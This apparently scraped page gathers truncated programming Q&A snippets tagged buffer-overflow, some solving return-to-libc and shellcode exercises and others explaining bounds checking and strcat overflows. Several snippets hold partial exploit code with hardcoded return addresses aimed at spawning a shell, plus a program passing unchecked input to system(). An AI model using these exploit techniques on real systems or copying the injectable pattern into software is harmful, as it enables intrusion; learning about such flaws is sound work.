buffer-overflow

问题 I'm supposed to come up with a program that exploits the "return to libc buffer overflow". This is, when executed, it cleanly exits and brings up a SHELL prompt. The program is executed in a bash terminal. Below is my C code: #include <stdio.h> int main(int argc, char*argv[]){ char buffer[7]; char buf[42]; int i = 0; while(i < 28) { buf[i] = 'a'; i = i + 1; } *(int *)&buf[28] = 0x4c4ab0; *(int *)&buf[32] = 0x4ba520; *(int *)&buf[36] = 0xbfffff13; strcpy(buffer, buf); return 0; } Using gdb, I

问题 I am on CentOS 6.4 32 bit and am trying to cause a buffer overflow in a program. Within GDB it works. Here is the output: [root@localhost bufferoverflow]# gdb stack GNU gdb (GDB) Red Hat Enterprise Linux (7.2-60.el6_4.1) Copyright (C) 2010 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and

问题 I am on CentOS 6.4 32 bit and am trying to cause a buffer overflow in a program. Within GDB it works. Here is the output: [root@localhost bufferoverflow]# gdb stack GNU gdb (GDB) Red Hat Enterprise Linux (7.2-60.el6_4.1) Copyright (C) 2010 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and

问题 Does Java have buffer overflows? If yes can you give me scenarios? 回答1: Since Java Strings are based on char arrays and Java automatically checks array bounds, buffer overflows are only possible in unusual scenarios: If you call native code via JNI In the JVM itself (usually written in C++) The interpreter or JIT compiler does not work correctly (Java bytecode mandated bounds checks) 回答2: Managed languages such as Java and C# do not have these problems, but the specific virtual machines (JVM

问题 #include <WhatHere?> #include <WhatHere?> #include <WhatHere?> int main(int argc, char **argv) { char command[50] = "echo "; strcat(command,argv[1]); // concatenate the input so that the final command is "echo <input>" system(command); // call the system() function to print the input return 0; // denote that the program has finished executing successfully } Can we get a remote access by running this code ? I know it is possible but please help me patch it up. 回答1: Assuming that you're worried

问题 I am trying to spawn a shell with some shellcode. The payload is in the program itself, however, when I run then program individually I get a segmentation fault, but when running in gdb, my shell opens. Can someone point out what the problem might be? MrMox@ubuntu:~/folder$ ./a.out h h Segmentation fault (core dumped) MrMox@ubuntu:~/folder$ gdb -q a.out Reading symbols from /home/folder/a.out...done. (gdb) run h h Starting program: /home/folder/a.out h h process 22119 is executing new program

问题 Hi guys im working on a CTF challenge and don't quite understand this asm command: mov %edx,0x20(%esp,%eax,4) Im assuming its: move $edx into (0x20 + $esp + $eax + 4) However when I checked this with gdb it isn't correct. Anyone mind explaining how this instruction works? Thanks for your help! 回答1: AT&T syntax for x86 memory references goes like this: displacement(base,index,scale) giving the address of displacement+base+(index*scale). That is, destination memory address for your instuction

问题 I have doing an exercise about a buffer overload on a C program, the goal of this problem is to get the root shell once I have inserted a shellcode into the program. This is what I have until now: STEP 1.- Firstable let´s see my C code in the file called file.c : root@kali:~# cat ./file.c #include <stdio.h> #include <string.h> void premio() { printf("I have altered the programs flow\n"); } int main(int argc, char *argv[]) { char buffer[100]; if (argc != 2) { printf("Use: %s argument\n",argv[0

问题 Many times I have problems with Buffer Overflow. int y[10][10][10]; ... y[0][15][3] = 8; How can I prevent this problem? Is there any good tool that can help me? 回答1: Neil's answer is better in the general case, but if you have a reason for using plain old arrays, you can use functions to get and set the values and also check that you're within the array bounds: #define MAX_INDEX 10 int y[MAX_INDEX][MAX_INDEX][MAX_INDEX]; int get_y(int a, int b, int c) { ASSERT(a >= 0 && a < MAX_INDEX);

问题 Can some one tell me what's wrong with this code??? char sms[] = "gr8"; strcat (sms, " & :)"); 回答1: sms is an array of size 4 1 . And you're appending more char literals, which is going outside of the array, as the array can accommodate at max 4 chars which is already occupied by g, r, 8, \0 . 1. By the way, why exactly 4? Answer : Because that there is a null character at the end! If you mention the size of array as shown below, then your code is valid and well-defined. char sms[10] = "gr8";